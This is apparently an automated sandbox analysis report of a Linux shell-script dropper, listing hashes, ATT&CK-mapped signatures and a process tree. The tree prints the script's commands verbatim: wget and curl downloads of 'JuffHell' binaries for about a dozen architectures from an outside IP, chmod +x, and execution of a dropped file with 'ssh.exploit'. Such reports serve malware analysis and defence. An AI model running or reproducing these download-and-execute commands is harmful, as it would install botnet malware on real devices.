Analysis

  • max time kernel
    33s
  • max time network
    34s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240418-en
  • resource tags
    arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system
  • submitted
    14-10-2024 14:51

General

  • Target
    30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
  • Size
    3KB
  • MD5
    4de883db50a87d2eaf32038a6f48a3cf
  • SHA1
    5d786ee84056677315f5eb9315f7a40d7fe8cb94
  • SHA256
    30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55
  • SHA512
    36bee2e2e6850fd3fb99fe832fb3de0f4792ac2b6fc7dc24987f4efb53ab8e747e6ace4d518ac3e2efa62cf997e787be7107b28a2cf305b0f7d13bbace13631d

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 13 IoCs
  • Reads runtime system information 13 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 14 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
    /tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
    1⤵
    • Writes file to tmp directory
    PID:706
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.x86
      2⤵
      PID:711
    • /usr/bin/curl
      curl -O http://194.15.36.34/xxx9/JuffHell.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:726
    • /bin/cat
      cat JuffHell.x86
      2⤵
      PID:732
    • /bin/chmod
      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
      2⤵
      • File and Directory Permissions Modification
      PID:734
    • /tmp/dayum0x1a5sfd15as1fa
      ./dayum0x1a5sfd15as1fa ssh.exploit
      2⤵
      • Executes dropped EXE
      PID:735
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.mips
      2⤵
      • System Network Configuration Discovery
      PID:736
    • /usr/bin/curl
      curl -O http://194.15.36.34/xxx9/JuffHell.mips
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:738
    • /bin/cat
      cat JuffHell.mips
      2⤵
      • System Network Configuration Discovery
      PID:739
    • /bin/chmod
      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
      2⤵
      • File and Directory Permissions Modification
      PID:740
    • /tmp/dayum0x1a5sfd15as1fa
      ./dayum0x1a5sfd15as1fa ssh.exploit
      2⤵
      • Executes dropped EXE
      PID:741
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.mpsl
      2⤵
      PID:742
    • /usr/bin/curl
      curl -O http://194.15.36.34/xxx9/JuffHell.mpsl
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:743
    • /bin/cat
      cat JuffHell.mpsl
      2⤵
      PID:744
    • /bin/chmod
      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
      2⤵
      • File and Directory Permissions Modification
      PID:745
    • /tmp/dayum0x1a5sfd15as1fa
      ./dayum0x1a5sfd15as1fa ssh.exploit
      2⤵
      • Executes dropped EXE
      PID:747
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.arm
      2⤵
      PID:749
    • /usr/bin/curl
      curl -O http://194.15.36.34/xxx9/JuffHell.arm
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:757
    • /bin/cat
      cat JuffHell.arm
      2⤵
      PID:763
    • /bin/chmod
      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
      2⤵
      • File and Directory Permissions Modification
      PID:765
    • /tmp/dayum0x1a5sfd15as1fa
      ./dayum0x1a5sfd15as1fa ssh.exploit
      2⤵
      • Executes dropped EXE
      PID:767
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.arm5
      2⤵
      PID:768
    • /usr/bin/curl
      curl -O http://194.15.36.34/xxx9/JuffHell.arm5
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:777
    • /bin/cat
      cat JuffHell.arm5
      2⤵
      PID:782
    • /bin/chmod
      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
      2⤵
      • File and Directory Permissions Modification
      PID:784
    • /tmp/dayum0x1a5sfd15as1fa
      ./dayum0x1a5sfd15as1fa ssh.exploit
      2⤵
      • Executes dropped EXE
      PID:785
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.arm6
      2⤵
      PID:788
    • /usr/bin/curl
      curl -O http://194.15.36.34/xxx9/JuffHell.arm6
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:833
    • /bin/cat
      cat JuffHell.arm6
      2⤵
      PID:834
    • /bin/chmod
      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
      2⤵
      • File and Directory Permissions Modification
      PID:835
    • /tmp/dayum0x1a5sfd15as1fa
      ./dayum0x1a5sfd15as1fa ssh.exploit
      2⤵
      • Executes dropped EXE
      PID:836
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.arm7
      2⤵
      PID:837
    • /usr/bin/curl
      curl -O http://194.15.36.34/xxx9/JuffHell.arm7
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:838
    • /bin/cat
      cat JuffHell.arm7
      2⤵
      PID:839
    • /bin/chmod
      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
      2⤵
      • File and Directory Permissions Modification
      PID:840
    • /tmp/dayum0x1a5sfd15as1fa
      ./dayum0x1a5sfd15as1fa ssh.exploit
      2⤵
      • Executes dropped EXE
      PID:841
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.ppc
      2⤵
      PID:842
    • /usr/bin/curl
      curl -O http://194.15.36.34/xxx9/JuffHell.ppc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:843
    • /bin/cat
      cat JuffHell.ppc
      2⤵
      PID:844
    • /bin/chmod
      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
      2⤵
      • File and Directory Permissions Modification
      PID:845
    • /tmp/dayum0x1a5sfd15as1fa
      ./dayum0x1a5sfd15as1fa ssh.exploit
      2⤵
      • Executes dropped EXE
      PID:846
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.m68k
      2⤵
      PID:847
    • /usr/bin/curl
      curl -O http://194.15.36.34/xxx9/JuffHell.m68k
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:848
    • /bin/cat
      cat JuffHell.m68k
      2⤵
      PID:849
    • /bin/chmod
      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
      2⤵
      • File and Directory Permissions Modification
      PID:850
    • /tmp/dayum0x1a5sfd15as1fa
      ./dayum0x1a5sfd15as1fa ssh.exploit
      2⤵
      • Executes dropped EXE
      PID:851
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.spc
      2⤵
      PID:852
    • /usr/bin/curl
      curl -O http://194.15.36.34/xxx9/JuffHell.spc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:853
    • /bin/cat
      cat JuffHell.spc
      2⤵
      PID:854
    • /bin/chmod
      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
      2⤵
      • File and Directory Permissions Modification
      PID:855
    • /tmp/dayum0x1a5sfd15as1fa
      ./dayum0x1a5sfd15as1fa ssh.exploit
      2⤵
      • Executes dropped EXE
      PID:856
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.i686
      2⤵
      PID:857
    • /usr/bin/curl
      curl -O http://194.15.36.34/xxx9/JuffHell.i686
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:858
    • /bin/cat
      cat JuffHell.i686
      2⤵
      PID:862
    • /bin/chmod
      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x86
      2⤵
      • File and Directory Permissions Modification
      PID:863
    • /tmp/dayum0x1a5sfd15as1fa
      ./dayum0x1a5sfd15as1fa ssh.exploit
      2⤵
      • Executes dropped EXE
      PID:864
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.sh4
      2⤵
      PID:865
    • /usr/bin/curl
      curl -O http://194.15.36.34/xxx9/JuffHell.sh4
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:866
    • /bin/cat
      cat JuffHell.sh4
      2⤵
      PID:867
    • /bin/chmod
      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x86
      2⤵
      • File and Directory Permissions Modification
      PID:868
    • /tmp/dayum0x1a5sfd15as1fa
      ./dayum0x1a5sfd15as1fa ssh.exploit
      2⤵
      • Executes dropped EXE
      PID:869
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.arc
      2⤵
      PID:870
    • /usr/bin/curl
      curl -O http://194.15.36.34/xxx9/JuffHell.arc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:871
    • /bin/cat
      cat JuffHell.arc
      2⤵
      PID:872
    • /bin/chmod
      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arc JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x86
      2⤵
      • File and Directory Permissions Modification
      PID:873
    • /tmp/dayum0x1a5sfd15as1fa
      ./dayum0x1a5sfd15as1fa ssh.exploit
      2⤵
      • Executes dropped EXE
      PID:874

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/JuffHell.x86
    Filesize
    162B
    MD5
    4f8e702cc244ec5d4de32740c0ecbd97
    SHA1
    3adb1f02d5b6054de0046e367c1d687b6cdf7aff
    SHA256
    9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a
    SHA512
    21047fea5269fee75a2a187aa09316519e35068cb2f2f76cfaf371e5224445e9d5c98497bd76fb9608d2b73e9dac1a3f5bfadfdc4623c479d53ecf93d81d3c9f